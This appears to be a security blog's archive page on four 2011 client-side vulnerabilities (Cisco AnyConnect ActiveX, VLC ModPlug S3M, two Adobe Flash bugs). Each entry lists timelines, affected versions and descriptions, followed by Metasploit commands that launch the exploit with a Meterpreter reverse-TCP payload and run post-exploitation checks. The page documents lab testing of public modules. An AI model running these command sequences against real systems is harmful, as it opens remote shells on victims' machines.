Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2011-2039 : Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute

Timeline :

Vulnerability discovered by Elazar Broad and submitted to iDefense Labs
Initial vulnerability notification to Cisco on 2009-02-24
Public release of Cisco Security Advisory on 2011-06-01
Metasploit PoC provided by bannedit on 2011-06-06

PoC provided by :

bannedit

Reference(s) :

CVE-2011-2039
OSVDB-72714
CISCO-SA-20110601-AC
iDefense Labs

Affected version(s) :

For Windows: all versions prior to 2.3.185
For Linux and Apple Mac OS X: all versions in major releases other than 2.5.x and 3.0.x
2.5.x releases prior to 2.5.3041
3.0.x releases prior to 3.0.629
Microsoft Windows Mobile versions are affected, but no updates are planned.

Tested on Windows XP SP3 with :

Cisco AnyConnect VPN Client 2.0.0343

Description :

This module exploits a vulnerability in the Cisco AnyConnect VPN client vpnweb.ocx ActiveX control. This control is typically used to install the VPN client. An attacker can set the 'url' property, which is where the control tries to locate the files needed to install the client. The control tries to download two files from the site specified in the 'url' property. One of these files is stored in a temporary directory and executed.

Commands :

use exploit/windows/browser/cisco_anyconnect_exec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2011-1574 : VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow

Timeline :

libmodplug vulnerability discovered by SEC Consult
libmodplug vendor contacted on 2011-03-25
libmodplug vendor released a new version on 2011-04-02
libmodplug vulnerability publicly released on 2011-04-07
VideoLAN VLC 1.1.9 released on 2011-04-12
Metasploit PoC provided by jduck on 2011-05-06

PoC provided by :

jduck

Reference(s) :

CVE-2011-1574
OSVDB-72143
VideoLAN VLC release notes

Affected version(s) :

VideoLAN VLC 1.1.8 and earlier versions for Windows, Macintosh, Linux and Solaris

Tested on Windows XP SP3 with :

VideoLAN VLC 1.1.8

Description :

This module exploits an input validation error in libmodplug as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC. NOTE: As of July 1st, 2010, VLC calls SetProcessDEPPolicy to permanently enable NX support on machines that support it. As such, this module is capable of bypassing DEP, but not ASLR.

Commands :

use exploit/windows/fileformat/vlc_modplug_s3m
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sysinfo
getuid

CVE-2011-0611 : Adobe Flash Player SWF Memory Corruption Vulnerability

Timeline :

Vulnerability discovered being exploited in the wild
First information about the 0day published on 2011-04-11
Security Advisory APSA11-02 posted by the vendor on 2011-04-11
First vulnerability analysis provided on 2011-04-11
Vendor update provided on 2011-04-15
Metasploit PoC provided by sinn3r on 2011-04-15

PoC provided by :

Unknown
sinn3r

Reference(s) :

CVE-2011-0611
APSA11-02
OSVDB-71686

Affected version(s) :

Adobe Flash Player 10.2.153.1 and earlier versions for Windows, Macintosh, Linux and Solaris
Adobe Flash Player 10.2.154.25 and earlier for Chrome users
Adobe Flash Player 10.2.156.12 and earlier versions for Android
Adobe AIR 2.6.19120 and earlier versions for Windows, Macintosh and Linux

Tested on Windows XP SP3 with :

Internet Explorer 7.0.5730.13
Adobe Flash Player 10.2.153.1

Description :

This module exploits a vulnerability in Adobe Flash Player that was discovered while being actively exploited in the wild. By embedding a specially crafted .swf file, Adobe Flash crashes due to an invalid use of an object type, which allows attackers to overwrite a pointer in memory and results in arbitrary code execution.

Commands :

use exploit/windows/browser/adobe_flashplayer_flash10o
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid

CVE-2011-0609 : Adobe Flash Player AVM Bytecode Verification Vulnerability

Timeline :

Vulnerability discovered being exploited in the wild
This vulnerability was used to attack RSA
First information about the 0day published on 2011-03-11
Security Advisory APSA11-01 posted by the vendor on 2011-03-14
First vulnerability analysis provided by villy on 2011-03-15
Metasploit PoC provided by bannedit on 2011-03-22

PoC provided by :

Unknown
bannedit

Reference(s) :

CVE-2011-0609
APSA11-01
OSVDB-71254

Affected version(s) :

Adobe Flash Player 10.2.152.33 and earlier versions for Windows, Macintosh, Linux and Solaris
Adobe Flash Player 10.2.154.18 and earlier for Chrome users
Adobe Flash Player 10.1.106.16 and earlier versions for Android
Adobe Reader and Acrobat X (10.0.1)
Earlier 10.x and 9.x versions of Reader and Acrobat for Windows and Macintosh

Tested on Windows XP SP3 with :

Internet Explorer 6.0.2900.5512
Adobe Flash Player 10.2.152.26

Description :

This module exploits a vulnerability in Adobe Flash Player. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT (Just-In-Time) code being executed. Specifically, this issue results in uninitialized memory being referenced and later executed. Taking advantage of this issue relies on heap spraying and controlling the uninitialized memory. Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several other browsers. DEP does catch the exploit and causes it to fail. Due to the nature of the uninitialized memory, it's fairly difficult to get around this restriction.

Commands :

use exploit/windows/browser/adobe_flashplayer_avm
set SRVHOST 192.168.178.21
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

Long time

sysinfo
getuid